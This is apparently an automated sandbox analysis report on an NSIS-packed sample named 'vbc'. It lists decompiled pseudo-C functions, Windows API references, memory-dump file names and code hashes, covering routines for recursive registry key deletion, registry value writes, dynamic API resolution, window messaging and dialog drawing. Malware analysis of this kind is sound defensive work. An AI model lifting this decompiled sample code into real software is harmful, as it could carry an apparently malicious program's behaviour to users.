                                                0x00000000
                                                0x73192588
                                                0x7319258b
                                                0x73192597
                                                0x73192599
                                                0x00000000
                                                0x00000000
                                                0x731925a5
                                                0x731925b1
                                                0x731925b4
                                                0x731925b6
                                                0x731925b9
                                                0x00000000
                                                0x00000000
                                                0x73192508
                                                0x73192502
                                                0x731924db
                                                0x731924e0
                                                0x00000000
                                                0x731924e0

                                                APIs
                                                • GlobalFree.KERNEL32(00000000), ref: 731925C2
                                                  • Part of subcall function 731912CC: lstrcpynW.KERNEL32(00000000,?,7319137F,00000019,731911CA,-000000A0), ref: 731912DC
                                                • GlobalAlloc.KERNEL32(00000040), ref: 73192548
                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,?,00000000,00000000), ref: 73192563
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.680955467.0000000073191000.00000020.00000001.01000000.00000004.sdmp, Offset: 73190000, based on PE: true
                                                • Associated: 00000004.00000002.680948427.0000000073190000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000004.00000002.680961588.0000000073194000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000004.00000002.680965648.0000000073196000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_73190000_vbc.jbxd
                                                Similarity
                                                • API ID: Global$AllocByteCharFreeMultiWidelstrcpyn
                                                • String ID:
                                                • API String ID: 4216380887-0
                                                • Opcode ID: 87cd1cb2167633991e206d8469c3b11e45fb6e249947eb63577346acf6b25b13
                                                • Instruction ID: af1fc8e7ede727d99c79809cd975c187203ce1d736c36e5c8232e389ca233dad
                                                • Opcode Fuzzy Hash: 87cd1cb2167633991e206d8469c3b11e45fb6e249947eb63577346acf6b25b13
                                                • Instruction Fuzzy Hash: C241AEB140838DDFF314EF259850BA677B8FB48310F1745A9E44A97580EB30A586CBB9
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 48%
                                                			E00402EA9(void* __eflags, void* _a4, short* _a8, signed int _a12) {
                                                				void* _v8;
                                                				int _v12;
                                                				short _v536;
                                                				void* _t27;
                                                				signed int _t33;
                                                				intOrPtr* _t35;
                                                				signed int _t45;
                                                				signed int _t46;
                                                				signed int _t47;
                                                
                                                				_t46 = _a12;
                                                				_t47 = _t46 & 0x00000300;
                                                				_t45 = _t46 & 0x00000001;
                                                				_t27 = E004063AA(__eflags, _a4, _a8, _t47 | 0x00000009,  &_v8);
                                                				if(_t27 == 0) {
                                                					if((_a12 & 0x00000002) == 0) {
                                                						L3:
                                                						_push(0x105);
                                                						_push( &_v536);
                                                						_push(0);
                                                						while(RegEnumKeyW(_v8, ??, ??, ??) == 0) {
                                                							__eflags = _t45;
                                                							if(__eflags != 0) {
                                                								L10:
                                                								RegCloseKey(_v8);
                                                								return 0x3eb;
                                                							}
                                                							_t33 = E00402EA9(__eflags, _v8,  &_v536, _a12);
                                                							__eflags = _t33;
                                                							if(_t33 != 0) {
                                                								break;
                                                							}
                                                							_push(0x105);
                                                							_push( &_v536);
                                                							_push(_t45);
                                                						}
                                                						RegCloseKey(_v8);
                                                						_t35 = E0040690A(3);
                                                						if(_t35 != 0) {
                                                							return  *_t35(_a4, _a8, _t47, 0);
                                                						}
                                                						return RegDeleteKeyW(_a4, _a8);
                                                					}
                                                					_v12 = 0;
                                                					if(RegEnumValueW(_v8, 0,  &_v536,  &_v12, 0, 0, 0, 0) != 0x103) {
                                                						goto L10;
                                                					}
                                                					goto L3;
                                                				}
                                                				return _t27;
                                                			}












                                                0x00402eb4
                                                0x00402ebd
                                                0x00402ec6
                                                0x00402ed2
                                                0x00402edb
                                                0x00402ee5
                                                0x00402f0a
                                                0x00402f10
                                                0x00402f15
                                                0x00402f16
                                                0x00402f46
                                                0x00402f1f
                                                0x00402f21
                                                0x00402f71
                                                0x00402f74
                                                0x00000000
                                                0x00402f7a
                                                0x00402f30
                                                0x00402f35
                                                0x00402f37
                                                0x00000000
                                                0x00000000
                                                0x00402f3f
                                                0x00402f44
                                                0x00402f45
                                                0x00402f45
                                                0x00402f52
                                                0x00402f5a
                                                0x00402f61
                                                0x00000000
                                                0x00402f8a
                                                0x00000000
                                                0x00402f69
                                                0x00402ef5
                                                0x00402f08
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00402f08
                                                0x00402f90

                                                APIs
                                                • RegEnumValueW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000), ref: 00402EFD
                                                • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402F49
                                                • RegCloseKey.ADVAPI32(?), ref: 00402F52
                                                • RegDeleteKeyW.ADVAPI32(?,?), ref: 00402F69
                                                • RegCloseKey.ADVAPI32(?), ref: 00402F74
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.679876025.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000004.00000002.679871422.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.679883945.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.679887439.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.679933543.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.679937425.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.679941913.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.679946315.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
                                                Similarity
                                                • API ID: CloseEnum$DeleteValue
                                                • String ID:
                                                • API String ID: 1354259210-0
                                                • Opcode ID: 78d35a7524f1d2205fa0e87ab22fa6bfb41dfe8b1a27fd9ec563711b6eb4cb1f
                                                • Instruction ID: ca6229ec891c5908b4c2d3bab14ae3db7b9396451d72a40731f1c02386a45f13
                                                • Opcode Fuzzy Hash: 78d35a7524f1d2205fa0e87ab22fa6bfb41dfe8b1a27fd9ec563711b6eb4cb1f
                                                • Instruction Fuzzy Hash: DA215A7150010ABBEF119F90CE89EEF7B7DEB50384F100076F909B21A0D7B49E54AA68
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 77%
                                                			E00401D81(void* __ebx, void* __edx) {
                                                				struct HWND__* _t30;
                                                				WCHAR* _t38;
                                                				void* _t48;
                                                				void* _t53;
                                                				signed int _t55;
                                                				signed int _t60;
                                                				long _t63;
                                                				void* _t65;
                                                
                                                				_t53 = __ebx;
                                                				if(( *(_t65 - 0x23) & 0x00000001) == 0) {
                                                					_t30 = GetDlgItem( *(_t65 - 8),  *(_t65 - 0x28));
                                                				} else {
                                                					E00402D84(2);
                                                					 *((intOrPtr*)(__ebp - 0x10)) = __edx;
                                                				}
                                                				_t55 =  *(_t65 - 0x24);
                                                				 *(_t65 + 8) = _t30;
                                                				_t60 = _t55 & 0x00000004;
                                                				 *(_t65 - 0x38) = _t55 & 0x00000003;
                                                				 *(_t65 - 0x18) = _t55 >> 0x1f;
                                                				 *(_t65 - 0x40) = _t55 >> 0x0000001e & 0x00000001;
                                                				if((_t55 & 0x00010000) == 0) {
                                                					_t38 =  *(_t65 - 0x2c) & 0x0000ffff;
                                                				} else {
                                                					_t38 = E00402DA6(0x11);
                                                				}
                                                				 *(_t65 - 0x44) = _t38;
                                                				GetClientRect( *(_t65 + 8), _t65 - 0x60);
                                                				asm("sbb esi, esi");
                                                				_t63 = LoadImageW( ~_t60 &  *0x434f00,  *(_t65 - 0x44),  *(_t65 - 0x38),  *(_t65 - 0x58) *  *(_t65 - 0x18),  *(_t65 - 0x54) *  *(_t65 - 0x40),  *(_t65 - 0x24) & 0x0000fef0);
                                                				_t48 = SendMessageW( *(_t65 + 8), 0x172,  *(_t65 - 0x38), _t63);
                                                				if(_t48 != _t53 &&  *(_t65 - 0x38) == _t53) {
                                                					DeleteObject(_t48);
                                                				}
                                                				if( *((intOrPtr*)(_t65 - 0x30)) >= _t53) {
                                                					_push(_t63);
                                                					E00406484();
                                                				}
                                                				 *0x434f88 =  *0x434f88 +  *((intOrPtr*)(_t65 - 4));
                                                				return 0;
                                                			}











                                                0x00401d81
                                                0x00401d85
                                                0x00401d9a
                                                0x00401d87
                                                0x00401d89
                                                0x00401d8f
                                                0x00401d8f
                                                0x00401da0
                                                0x00401da3
                                                0x00401dad
                                                0x00401db0
                                                0x00401db8
                                                0x00401dc9
                                                0x00401dcc
                                                0x00401dd7
                                                0x00401dce
                                                0x00401dd0
                                                0x00401dd0
                                                0x00401ddb
                                                0x00401de5
                                                0x00401e0c
                                                0x00401e1b
                                                0x00401e29
                                                0x00401e31
                                                0x00401e39
                                                0x00401e39
                                                0x00401e42
                                                0x00401e48
                                                0x00402ba4
                                                0x00402ba4
                                                0x00402c2d
                                                0x00402c39

                                                APIs
                                                • GetDlgItem.USER32(?,?), ref: 00401D9A
                                                • GetClientRect.USER32 ref: 00401DE5
                                                • LoadImageW.USER32 ref: 00401E15
                                                • SendMessageW.USER32(?,00000172,?,00000000), ref: 00401E29
                                                • DeleteObject.GDI32(00000000), ref: 00401E39
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.679876025.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000004.00000002.679871422.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.679883945.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.679887439.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.679933543.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.679937425.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.679941913.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.679946315.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
                                                Similarity
                                                • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                • String ID:
                                                • API String ID: 1849352358-0
                                                • Opcode ID: 0d14a93a4aa2f7ddc0f91d11ffebc05af74b5a93feb44974f4da7284e64bbe2b
                                                • Instruction ID: b69f8f45c5cbb28dd5603d9b1d667d2ce3d3910c133b75fee4ecc707c572ca23
                                                • Opcode Fuzzy Hash: 0d14a93a4aa2f7ddc0f91d11ffebc05af74b5a93feb44974f4da7284e64bbe2b
                                                • Instruction Fuzzy Hash: 3321F672904119AFCB05DBA4DE45AEEBBB5EF08314F14003AFA45F62A0DB389951DB98
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 73%
                                                			E00401E4E(intOrPtr __edx) {
                                                				void* __edi;
                                                				int _t9;
                                                				signed char _t15;
                                                				struct HFONT__* _t18;
                                                				intOrPtr _t30;
                                                				void* _t31;
                                                				struct HDC__* _t33;
                                                				void* _t35;
                                                
                                                				_t30 = __edx;
                                                				_t33 = GetDC( *(_t35 - 8));
                                                				_t9 = E00402D84(2);
                                                				 *((intOrPtr*)(_t35 - 0x10)) = _t30;
                                                				0x40cdf0->lfHeight =  ~(MulDiv(_t9, GetDeviceCaps(_t33, 0x5a), 0x48));
                                                				ReleaseDC( *(_t35 - 8), _t33);
                                                				 *0x40ce00 = E00402D84(3);
                                                				_t15 =  *((intOrPtr*)(_t35 - 0x20));
                                                				 *((intOrPtr*)(_t35 - 0x10)) = _t30;
                                                				 *0x40ce07 = 1;
                                                				 *0x40ce04 = _t15 & 0x00000001;
                                                				 *0x40ce05 = _t15 & 0x00000002;
                                                				 *0x40ce06 = _t15 & 0x00000004;
                                                				E0040657A(_t9, _t31, _t33, 0x40ce0c,  *((intOrPtr*)(_t35 - 0x2c)));
                                                				_t18 = CreateFontIndirectW(0x40cdf0);
                                                				_push(_t18);
                                                				_push(_t31);
                                                				E00406484();
                                                				 *0x434f88 =  *0x434f88 +  *((intOrPtr*)(_t35 - 4));
                                                				return 0;
                                                			}











                                                0x00401e4e
                                                0x00401e59
                                                0x00401e5b
                                                0x00401e68
                                                0x00401e7f
                                                0x00401e84
                                                0x00401e91
                                                0x00401e96
                                                0x00401e9a
                                                0x00401ea5
                                                0x00401eac
                                                0x00401ebe
                                                0x00401ec4
                                                0x00401ec9
                                                0x00401ed3
                                                0x00402638
                                                0x0040156d
                                                0x00402ba4
                                                0x00402c2d
                                                0x00402c39

                                                APIs
                                                • GetDC.USER32(?), ref: 00401E51
                                                • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401E6B
                                                • MulDiv.KERNEL32 ref: 00401E73
                                                • ReleaseDC.USER32(?,00000000), ref: 00401E84
                                                  • Part of subcall function 0040657A: lstrcatW.KERNEL32 ref: 0040671F
                                                  • Part of subcall function 0040657A: lstrlenW.KERNEL32(Call,00000000,Skipped: C:\Users\user\AppData\Local\Temp\nsb1814.tmp\System.dll,?,004055D6,Skipped: C:\Users\user\AppData\Local\Temp\nsb1814.tmp\System.dll,00000000), ref: 00406779
                                                • CreateFontIndirectW.GDI32(0040CDF0), ref: 00401ED3
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.679876025.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000004.00000002.679871422.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.679883945.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.679887439.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.679933543.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.679937425.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.679941913.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.679946315.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
                                                Similarity
                                                • API ID: CapsCreateDeviceFontIndirectReleaselstrcatlstrlen
                                                • String ID:
                                                • API String ID: 2584051700-0
                                                • Opcode ID: 687ed4edf854cbed3824faf0125c127d44ccdaa2da2dd8af5b0190bd77e460f4
                                                • Instruction ID: 78b13ae86a0973dc2b43aa2eb6c1af0beb3c1ef463c522f55250376beecb9f8a
                                                • Opcode Fuzzy Hash: 687ed4edf854cbed3824faf0125c127d44ccdaa2da2dd8af5b0190bd77e460f4
                                                • Instruction Fuzzy Hash: 7001B571904241EFEB005BB0EE49B9A3FB4BB15301F108A39F541B71D2C7B904458BED
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 100%
                                                			E731916BD(struct HINSTANCE__* _a4, short* _a8) {
                                                				_Unknown_base(*)()* _t7;
                                                				void* _t10;
                                                				int _t14;
                                                
                                                				_t14 = WideCharToMultiByte(0, 0, _a8, 0xffffffff, 0, 0, 0, 0);
                                                				_t10 = GlobalAlloc(0x40, _t14);
                                                				WideCharToMultiByte(0, 0, _a8, 0xffffffff, _t10, _t14, 0, 0);
                                                				_t7 = GetProcAddress(_a4, _t10);
                                                				GlobalFree(_t10);
                                                				return _t7;
                                                			}






                                                0x731916d7
                                                0x731916e3
                                                0x731916f0
                                                0x731916f7
                                                0x73191700
                                                0x7319170c

                                                APIs
                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,00000808,00000000,?,00000000,731922D8,?,00000808), ref: 731916D5
                                                • GlobalAlloc.KERNEL32(00000040,00000000,?,00000000,731922D8,?,00000808), ref: 731916DC
                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,?,00000000,731922D8,?,00000808), ref: 731916F0
                                                • GetProcAddress.KERNEL32(731922D8,00000000,?,00000000,731922D8,?,00000808), ref: 731916F7
                                                • GlobalFree.KERNEL32(00000000), ref: 73191700
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.680955467.0000000073191000.00000020.00000001.01000000.00000004.sdmp, Offset: 73190000, based on PE: true
                                                • Associated: 00000004.00000002.680948427.0000000073190000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000004.00000002.680961588.0000000073194000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000004.00000002.680965648.0000000073196000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_73190000_vbc.jbxd
                                                Similarity
                                                • API ID: ByteCharGlobalMultiWide$AddressAllocFreeProc
                                                • String ID:
                                                • API String ID: 1148316912-0
                                                • Opcode ID: a5b4d79d9d8ffe5e2abf76b6c9ac7add800afb87eb04119507bd0eddfc782aa9
                                                • Instruction ID: cf506b471f06d22c751594545aea33655e35dddecd9ad5be1973fad5fb9f9294
                                                • Opcode Fuzzy Hash: a5b4d79d9d8ffe5e2abf76b6c9ac7add800afb87eb04119507bd0eddfc782aa9
                                                • Instruction Fuzzy Hash: 56F0A2731061787BD62167A78C4CDDB7F9CEF8B2F5B160225F61CA119089615D01D7F1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 59%
                                                			E00401C43(intOrPtr __edx) {
                                                				int _t29;
                                                				long _t30;
                                                				signed int _t32;
                                                				WCHAR* _t35;
                                                				long _t36;
                                                				int _t41;
                                                				signed int _t42;
                                                				int _t46;
                                                				int _t56;
                                                				intOrPtr _t57;
                                                				struct HWND__* _t63;
                                                				void* _t64;
                                                
                                                				_t57 = __edx;
                                                				_t29 = E00402D84(3);
                                                				 *((intOrPtr*)(_t64 - 0x10)) = _t57;
                                                				 *(_t64 - 0x18) = _t29;
                                                				_t30 = E00402D84(4);
                                                				 *((intOrPtr*)(_t64 - 0x10)) = _t57;
                                                				 *(_t64 + 8) = _t30;
                                                				if(( *(_t64 - 0x1c) & 0x00000001) != 0) {
                                                					 *((intOrPtr*)(__ebp - 0x18)) = E00402DA6(0x33);
                                                				}
                                                				__eflags =  *(_t64 - 0x1c) & 0x00000002;
                                                				if(( *(_t64 - 0x1c) & 0x00000002) != 0) {
                                                					 *(_t64 + 8) = E00402DA6(0x44);
                                                				}
                                                				__eflags =  *((intOrPtr*)(_t64 - 0x34)) - 0x21;
                                                				_push(1);
                                                				if(__eflags != 0) {
                                                					_t61 = E00402DA6();
                                                					_t32 = E00402DA6();
                                                					asm("sbb ecx, ecx");
                                                					asm("sbb eax, eax");
                                                					_t35 =  ~( *_t31) & _t61;
                                                					__eflags = _t35;
                                                					_t36 = FindWindowExW( *(_t64 - 0x18),  *(_t64 + 8), _t35,  ~( *_t32) & _t32);
                                                					goto L10;
                                                				} else {
                                                					_t63 = E00402D84();
                                                					 *((intOrPtr*)(_t64 - 0x10)) = _t57;
                                                					_t41 = E00402D84(2);
                                                					 *((intOrPtr*)(_t64 - 0x10)) = _t57;
                                                					_t56 =  *(_t64 - 0x1c) >> 2;
                                                					if(__eflags == 0) {
                                                						_t36 = SendMessageW(_t63, _t41,  *(_t64 - 0x18),  *(_t64 + 8));
                                                						L10:
                                                						 *(_t64 - 0x38) = _t36;
                                                					} else {
                                                						_t42 = SendMessageTimeoutW(_t63, _t41,  *(_t64 - 0x18),  *(_t64 + 8), _t46, _t56, _t64 - 0x38);
                                                						asm("sbb eax, eax");
                                                						 *((intOrPtr*)(_t64 - 4)) =  ~_t42 + 1;
                                                					}
                                                				}
                                                				__eflags =  *((intOrPtr*)(_t64 - 0x30)) - _t46;
                                                				if( *((intOrPtr*)(_t64 - 0x30)) >= _t46) {
                                                					_push( *(_t64 - 0x38));
                                                					E00406484();
                                                				}
                                                				 *0x434f88 =  *0x434f88 +  *((intOrPtr*)(_t64 - 4));
                                                				return 0;
                                                			}















                                                0x00401c43
                                                0x00401c45
                                                0x00401c4c
                                                0x00401c4f
                                                0x00401c52
                                                0x00401c5c
                                                0x00401c60
                                                0x00401c63
                                                0x00401c6c
                                                0x00401c6c
                                                0x00401c6f
                                                0x00401c73
                                                0x00401c7c
                                                0x00401c7c
                                                0x00401c7f
                                                0x00401c83
                                                0x00401c85
                                                0x00401cda
                                                0x00401cdc
                                                0x00401ce7
                                                0x00401cf1
                                                0x00401cf4
                                                0x00401cf4
                                                0x00401cfd
                                                0x00000000
                                                0x00401c87
                                                0x00401c8e
                                                0x00401c90
                                                0x00401c93
                                                0x00401c99
                                                0x00401ca0
                                                0x00401ca3
                                                0x00401ccb
                                                0x00401d03
                                                0x00401d03
                                                0x00401ca5
                                                0x00401cb3
                                                0x00401cbb
                                                0x00401cbe
                                                0x00401cbe
                                                0x00401ca3
                                                0x00401d06
                                                0x00401d09
                                                0x00401d0f
                                                0x00402ba4
                                                0x00402ba4
                                                0x00402c2d
                                                0x00402c39

                                                APIs
                                                • SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401CB3
                                                • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401CCB
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.679876025.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000004.00000002.679871422.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.679883945.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.679887439.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.679933543.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.679937425.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.679941913.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.679946315.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
                                                Similarity
                                                • API ID: MessageSend$Timeout
                                                • String ID: !
                                                • API String ID: 1777923405-2657877971
                                                • Opcode ID: 56378305e9cef062e59ac21505f1e4874eb63478d5e018d68d94a8de4df44513
                                                • Instruction ID: 549e056fbb7746b1afa8e7352ee9f1cbf83a3633853e14f9ff1f16dc1dd81c22
                                                • Opcode Fuzzy Hash: 56378305e9cef062e59ac21505f1e4874eb63478d5e018d68d94a8de4df44513
                                                • Instruction Fuzzy Hash: 46219C7190420AAFEF05AFA4D94AAAE7BB4FF84304F14453EF601B61D0D7B88941CB98
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 77%
                                                			E00404D46(int _a4, intOrPtr _a8, signed int _a12, signed int _a16) {
                                                				char _v68;
                                                				char _v132;
                                                				void* __ebx;
                                                				void* __edi;
                                                				void* __esi;
                                                				signed int _t23;
                                                				signed int _t24;
                                                				void* _t31;
                                                				void* _t33;
                                                				void* _t34;
                                                				void* _t44;
                                                				signed int _t46;
                                                				signed int _t50;
                                                				signed int _t52;
                                                				signed int _t53;
                                                				signed int _t55;
                                                
                                                				_t23 = _a16;
                                                				_t53 = _a12;
                                                				_t44 = 0xffffffdc;
                                                				if(_t23 == 0) {
                                                					_push(0x14);
                                                					_pop(0);
                                                					_t24 = _t53;
                                                					if(_t53 < 0x100000) {
                                                						_push(0xa);
                                                						_pop(0);
                                                						_t44 = 0xffffffdd;
                                                					}
                                                					if(_t53 < 0x400) {
                                                						_t44 = 0xffffffde;
                                                					}
                                                					if(_t53 < 0xffff3333) {
                                                						_t52 = 0x14;
                                                						asm("cdq");
                                                						_t24 = 1 / _t52 + _t53;
                                                					}
                                                					_t25 = _t24 & 0x00ffffff;
                                                					_t55 = _t24 >> 0;
                                                					_t46 = 0xa;
                                                					_t50 = ((_t24 & 0x00ffffff) + _t25 * 4 + (_t24 & 0x00ffffff) + _t25 * 4 >> 0) % _t46;
                                                				} else {
                                                					_t55 = (_t23 << 0x00000020 | _t53) >> 0x14;
                                                					_t50 = 0;
                                                				}
                                                				_t31 = E0040657A(_t44, _t50, _t55,  &_v68, 0xffffffdf);
                                                				_t33 = E0040657A(_t44, _t50, _t55,  &_v132, _t44);
                                                				_t34 = E0040657A(_t44, _t50, 0x42d268, 0x42d268, _a8);
                                                				wsprintfW(_t34 + lstrlenW(0x42d268) * 2, L"%u.%u%s%s", _t55, _t50, _t33, _t31);
                                                				return SetDlgItemTextW( *0x433ed8, _a4, 0x42d268);
                                                			}



















                                                0x00404d4f
                                                0x00404d54
                                                0x00404d5c
                                                0x00404d5d
                                                0x00404d6a
                                                0x00404d72
                                                0x00404d73
                                                0x00404d75
                                                0x00404d77
                                                0x00404d79
                                                0x00404d7c
                                                0x00404d7c
                                                0x00404d83
                                                0x00404d89
                                                0x00404d89
                                                0x00404d90
                                                0x00404d97
                                                0x00404d9a
                                                0x00404d9d
                                                0x00404d9d
                                                0x00404da1
                                                0x00404db1
                                                0x00404db3
                                                0x00404db6
                                                0x00404d5f
                                                0x00404d5f
                                                0x00404d66
                                                0x00404d66
                                                0x00404dbe
                                                0x00404dc9
                                                0x00404ddf
                                                0x00404df0
                                                0x00404e0c

                                                APIs
                                                • lstrlenW.KERNEL32(0042D268,0042D268,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404DE7
                                                • wsprintfW.USER32 ref: 00404DF0
                                                • SetDlgItemTextW.USER32 ref: 00404E03
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.679876025.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000004.00000002.679871422.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.679883945.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.679887439.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.679933543.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.679937425.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.679941913.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.679946315.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
                                                Similarity
                                                • API ID: ItemTextlstrlenwsprintf
                                                • String ID: %u.%u%s%s
                                                • API String ID: 3540041739-3551169577
                                                • Opcode ID: 5273c8e1ef6d25911cf1b9a0066a557bca8c43180978e8caf7984b32bac85cc4
                                                • Instruction ID: d7f2b51e3f2153b105aad6c1cbcae815e44f670c765de83d30fbb221df5484fa
                                                • Opcode Fuzzy Hash: 5273c8e1ef6d25911cf1b9a0066a557bca8c43180978e8caf7984b32bac85cc4
                                                • Instruction Fuzzy Hash: AC11D573A041283BDB10656DAC45E9E369CAF81334F254237FA66F21D1EA78D91182E8
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 83%
                                                			E0040248A(void* __eax, int __ebx, intOrPtr __edx, void* __eflags) {
                                                				void* _t20;
                                                				void* _t21;
                                                				int _t24;
                                                				int _t30;
                                                				intOrPtr _t33;
                                                				void* _t34;
                                                				intOrPtr _t37;
                                                				void* _t39;
                                                				void* _t42;
                                                
                                                				_t42 = __eflags;
                                                				_t33 = __edx;
                                                				_t30 = __ebx;
                                                				_t37 =  *((intOrPtr*)(_t39 - 0x20));
                                                				_t34 = __eax;
                                                				 *(_t39 - 0x10) =  *(_t39 - 0x1c);
                                                				 *(_t39 - 0x44) = E00402DA6(2);
                                                				_t20 = E00402DA6(0x11);
                                                				 *(_t39 - 4) = 1;
                                                				_t21 = E00402E36(_t42, _t34, _t20, 2);
                                                				 *(_t39 + 8) = _t21;
                                                				if(_t21 != __ebx) {
                                                					_t24 = 0;
                                                					if(_t37 == 1) {
                                                						E00402DA6(0x23);
                                                						_t24 = lstrlenW(0x40b5f0) + _t29 + 2;
                                                					}
                                                					if(_t37 == 4) {
                                                						 *0x40b5f0 = E00402D84(3);
                                                						 *((intOrPtr*)(_t39 - 0x38)) = _t33;
                                                						_t24 = _t37;
                                                					}
                                                					if(_t37 == 3) {
                                                						_t24 = E004032B4( *((intOrPtr*)(_t39 - 0x24)), _t30, 0x40b5f0, 0x1800);
                                                					}
                                                					if(RegSetValueExW( *(_t39 + 8),  *(_t39 - 0x44), _t30,  *(_t39 - 0x10), 0x40b5f0, _t24) == 0) {
                                                						 *(_t39 - 4) = _t30;
                                                					}
                                                					_push( *(_t39 + 8));
                                                					RegCloseKey();
                                                				}
                                                				 *0x434f88 =  *0x434f88 +  *(_t39 - 4);
                                                				return 0;
                                                			}












                                                0x0040248a
                                                0x0040248a
                                                0x0040248a
                                                0x0040248a
                                                0x0040248d
                                                0x00402494
                                                0x0040249e
                                                0x004024a1
                                                0x004024aa
                                                0x004024b1
                                                0x004024b8
                                                0x004024bb
                                                0x004024c1
                                                0x004024cb
                                                0x004024cf
                                                0x004024da
                                                0x004024da
